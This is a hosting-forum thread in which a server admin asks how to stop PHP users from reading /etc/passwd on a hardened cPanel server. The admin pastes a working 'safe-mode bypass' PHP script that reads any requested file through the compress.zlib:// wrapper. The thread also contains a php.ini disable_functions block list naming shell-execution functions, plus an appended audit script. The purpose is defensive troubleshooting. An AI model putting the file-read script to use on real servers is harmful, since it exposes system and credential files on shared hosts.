Best way to secure server from symlinks?
In some parts I was able to secure my server, in some parts not.
I can't find a way to block symlinks permanently on my server.
I have a jailed Apache and a hardened kernel, blocked PHP functions, and still I'm able to put a symlink on the host and get info like everything that is in /etc/passwd,
but when I turn on mod_security from the user panel I can't read the /etc/passwd file anymore,
even if open_basedir is ON I am able to read the /etc/passwd file!
Is there any way to disallow clients from turning mod_security off/on?!
I tried to turn safe_mode on but that crashed everything; only sites with just HTML/CSS designs weren't affected :confused: and on others I was getting error 505,
In the old version of cPanel my server was pretty secure, but I can't secure it with the latest version (I didn't do an update; it was a fresh install on a new server).
Thank you!
As for info:
[root@node1 ~]# cat /etc/redhat-release
CentOS release 6.8 (Final)
[root@node1 ~]# cat /var/cpanel/envtype
standard
[root@node1 ~]# uname -r
2.6.32-642.13.1.199.cpanel6.x86_64
[root@node1 ~]# php -v
ea-php-cli Copyright 2016 cPanel, Inc.
PHP 5.6.30 (cgi-fcgi) (built: Jan 25 2017 04:19:44)
Copyright (c) 1997-2016 The PHP Group
Zend Engine v2.6.0, Copyright (c) 1998-2016 Zend Technologies
with the ionCube PHP Loader v4.7.5, Copyright (c) 2002-2014, by ionCube Ltd., and
with Zend Guard Loader v3.3, Copyright (c) 1998-2014, by Zend Technologies
with Zend OPcache v7.0.4-dev, Copyright (c) 1999-2015, by Zend Technologies
Use Cpanel Jailed by default = ON
CGIEmail and CGIEcho = OFF
Enable File Protect = ON
Blank referrer safety check = ON
Referrer safety check = ON
EXPERIMENTAL: Jail Apache Virtual Hosts using mod_ruid2 and cPanel jailshell = ON
open_basedir = ON
cPanel Security Advisor SCAN LOG. attached as 1. Apache conf. for "/"
Symlink Protection = ON
ExecCGI = ON
FollowSymLinks = ON
Includes = ON
IncludesNOEXEC = ON
Indexes = ON
MultiViews = ON
SymLinksIfOwnerMatch = ON
EA4 Profile,
Apache 2.4
config
config-runtime
mod_bwlimited
mod_cgi
mod_deflate
mod_env
mod_expires
mod_headers
mod_heartbeat
mod_heartmonitor
mod_mpm_prefork
mod_proxy
mod_proxy_fcgi
mod_proxy_http
mod_remoteip
mod_ruid2
mod_security2
mod_ssl
mod_unique_id
mod_watchdog
tools
PHP 5.6
libc-client
pear
php
php-bcmath
php-bz2
php-calendar
php-cli
php-common
php-curl
php-devel
php-enchant
php-fileinfo
php-fpm
php-ftp
php-gd
php-gettext
php-imap
php-intl
php-ioncube
php-ldap
php-litespeed
php-mbstring
php-mcrypt
php-mysqlnd
php-pdo
php-pgsql
php-posix
php-process
php-pspell
php-soap
php-sockets
php-sourceguardian
php-tidy
php-xml
php-xmlrpc
php-zendguard
php-zip
runtime
On php.ini file
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,ini_set
allow_url_fopen = Off
allow_url_include = Off
cPanel CSF Scan. Score 137/144 (other stuff is about CloudLinux, SSH, nameservers geographically etc.). cPanel Version: WHM 62.0 [Build 10]. I've read the docs and I did those steps which I have written here, but I'm wrong somewhere or I didn't find everything to fix this problem. I hope someone here can tell me where I'm wrong or what I missed! Thanks.
Hello, It looks like this system is configured to use the Bluehost patch, however it's not required because you already use the cPanel hardened kernel for symlink protection at the kernel level. You should select Off for the Symlink Protection option in the Global Configuration section of WHM's Apache Configuration interface (Home >> Service Configuration >> Apache Configuration). This will correct the symlink warning message you see in "WHM >> Security Advisor". Regarding the ability to view the /etc/passwd data, could you let us know the specific steps you are taking to reproduce that behavior? Thank you.
Sure, there's a piece of code which can read it: "Php Safe-Mode Bypass (Read Files)".
File: eg: /etc/passwd

```php
<?php
// The script as pasted in the thread, reassembled from the garbled copy
// (the HTML markup around the echoed text was lost in the paste).
// It copies the requested file through the compress.zlib:// stream
// wrapper into a temp file and then reads that temp file back.
function rsg_read() {
    $test = "";
    $temp = tempnam($test, "cx");
    $file = $_GET['file'];
    $get = htmlspecialchars($file);
    echo "<br>Trying To Get File $get<br>";
    if (copy("compress.zlib://" . $file, $temp)) {
        $fichier = fopen($temp, "r");
        $action = fread($fichier, filesize($temp));
        fclose($fichier);
        $source = htmlspecialchars($action);
        echo "<b>Start $get</b><br><pre>$source</pre><br><b>Fin $get</b>";
        unlink($temp);
    } else {
        die("Sorry... File " . htmlspecialchars($file) . " dosen't exists or you don't have access.");
    }
}
if (isset($_GET['file'])) {
    rsg_read();
}
?>
```
The script wasn't created by me, so I don't know too much about it!
For now I found a fix for this: I added "fopen" to the disabled functions. I don't know if this will cause any problems on websites, but nothing has been reported so far :/
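To check a php.ini against the function blocklist from the thread (plus the fopen entry from the follow-up) and confirm open_basedir is set, here is an added audit script that is not part of the thread or of cPanel; the php.ini content and paths it uses are constructed for the demo.

```sh
#!/bin/sh
# Added example: audit a php.ini against the disable_functions list the
# poster uses, plus "fopen" from the follow-up, and check open_basedir.
# The sample php.ini below is constructed for the demo, not from a server.

# Functions disabled in the thread's php.ini, plus fopen from the follow-up.
REQUIRED_DISABLED="exec passthru shell_exec system proc_open popen parse_ini_file show_source ini_set fopen"

# Print each name in REQUIRED_DISABLED that is missing from the last
# uncommented disable_functions line of the php.ini given as $1.
missing_disabled() {
    ini="$1"
    have=$(grep -E '^[[:space:]]*disable_functions[[:space:]]*=' "$ini" | tail -n 1 \
           | cut -d= -f2- | tr -d ' \t\r' | tr ',' '\n')
    for f in $REQUIRED_DISABLED; do
        printf '%s\n' "$have" | grep -qx "$f" || printf '%s\n' "$f"
    done
}

# Exit 0 if open_basedir has a non-empty value in the php.ini given as $1.
open_basedir_set() {
    grep -E '^[[:space:]]*open_basedir[[:space:]]*=[[:space:]]*[^[:space:]]' "$1" >/dev/null
}

# Constructed sample: the thread's php.ini settings before fopen was added.
SAMPLE_INI=$(mktemp)
cat >"$SAMPLE_INI" <<'EOF'
; constructed sample php.ini for the demo
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source,ini_set
allow_url_fopen = Off
allow_url_include = Off
open_basedir = /home/user:/tmp
EOF

echo "Missing from disable_functions:"
missing_disabled "$SAMPLE_INI"          # prints: fopen
open_basedir_set "$SAMPLE_INI" && echo "open_basedir is set" || echo "open_basedir NOT set"
```

Note that a great deal of ordinary PHP code calls fopen, so expect breakage on real sites if it is added to disable_functions.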